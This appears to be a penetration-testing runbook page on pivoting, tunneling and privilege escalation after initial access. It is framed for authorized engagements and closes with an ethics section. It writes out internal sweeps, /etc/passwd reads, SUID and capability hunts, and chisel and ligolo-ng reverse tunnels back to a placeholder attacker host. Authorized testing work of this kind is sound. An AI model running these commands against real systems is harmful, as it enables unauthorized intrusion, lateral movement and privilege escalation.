Generic Hackingupdated Oct 1, 2026

Pivoting, Tunneling & Privilege Escalation

Post-access runbook for authorized engagements: host triage, internal discovery, SOCKS/L3 tunneling, and systematic Linux and Windows privilege-escalation enumeration.

toolbox:chiselligolo-ngproxychainslinpeas

A foothold is a doorway, not the objective. This runbook covers moving inside the estate — only as far as the engagement explicitly allows, and against authorized hosts only.

1. Situational awareness

On any new host, map what it can see and reach before pivoting.

id; whoami; hostname; uname -a
ip a; ip route; cat /etc/hosts
ps aux; ss -tulpn

# Quick user and privilege context
sudo -n -l 2>/dev/null
cat /etc/passwd | grep -v nologin

2. Internal discovery

# Sweep the subnet the foothold can reach
for i in $(seq 1 254); do (ping -c1 -W1 10.10.10.$i >/dev/null 2>&1 && echo "10.10.10.$i up") & done; wait

# SMB/AD enumeration if Windows services are present
enum4linux-ng -A 10.10.10.10 -oJ enum4linux.json

Look for shares, internal DNS, and trust relationships pointing at a higher-value host.

3. Tunneling and pivoting

Route tooling through the foothold instead of dropping tools everywhere.

# Chisel: reverse SOCKS proxy
# attacker:  chisel server -p 8080 --reverse
# foothold:  ./chisel client <attacker>:8080 R:socks

# Point proxychains at the SOCKS port (default 1080)
proxychains nmap -sT -Pn -p 445,3389,5985 --open 10.10.10.0/24

# Internal web access through the tunnel
proxychains curl -s http://10.10.10.20:8080/ | head
# ligolo-ng gives a cleaner L3 tunnel with a TUN interface
# attacker:  ./proxy -selfcert
# foothold:  ./agent -connect <attacker>:11601 -ignore-cert
# then add the route and bring the interface up on the attacker

4. Linux privilege escalation

# Automate the sweep
./linpeas.sh -a | tee linpeas.out

# Targeted manual checks
sudo -l
find / -perm -4000 -type f 2>/dev/null
getcap -r / 2>/dev/null
cat /etc/crontab; ls -la /etc/cron.*

Common paths: SUID/capability binaries, writable cron scripts, misconfigured sudo, group-writable files, docker/lxd groups, credentials in history and configs.

5. Windows privilege escalation

# Host and privilege triage (run via your shell)
whoami /priv
whoami /groups
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

# Automated sweep
.\winPEASx64.exe | tee winpeas.txt

Look for SeImpersonate, SeDebug, SeBackup; unquoted service paths; weak service permissions; AlwaysInstallElevated; stored credentials. When AD is in play, consider Kerberoasting and AS-REP roasting.

6. Full pipeline

# 1. Situational awareness
id; whoami; hostname; uname -a; ip a; ip route; ps aux; ss -tulpn

# 2. Internal sweep + AD enumeration
for i in $(seq 1 254); do (ping -c1 -W1 10.10.10.$i >/dev/null 2>&1 && echo "10.10.10.$i up") & done; wait
enum4linux-ng -A 10.10.10.10 -oJ enum4linux.json

# 3. Tunnel (chisel server on attacker, client on foothold)
# attacker:  chisel server -p 8080 --reverse
# foothold:  ./chisel client <attacker>:8080 R:socks
proxychains nmap -sT -Pn -p 445,3389,5985 --open 10.10.10.0/24

# 4. Privilege escalation enumeration
./linpeas.sh -a | tee linpeas.out
sudo -l; find / -perm -4000 -type f 2>/dev/null; getcap -r / 2>/dev/null
.\winPEASx64.exe | tee winpeas.txt

Ethics & legality

  • Pivot only within the authorized scope and network boundaries agreed in the rules of engagement.
  • Escalate only to the level needed to prove impact; do not continue “to see how far it goes.”
  • Never modify data, create persistence, or touch systems outside scope.
  • Document every host touched and the exact command used.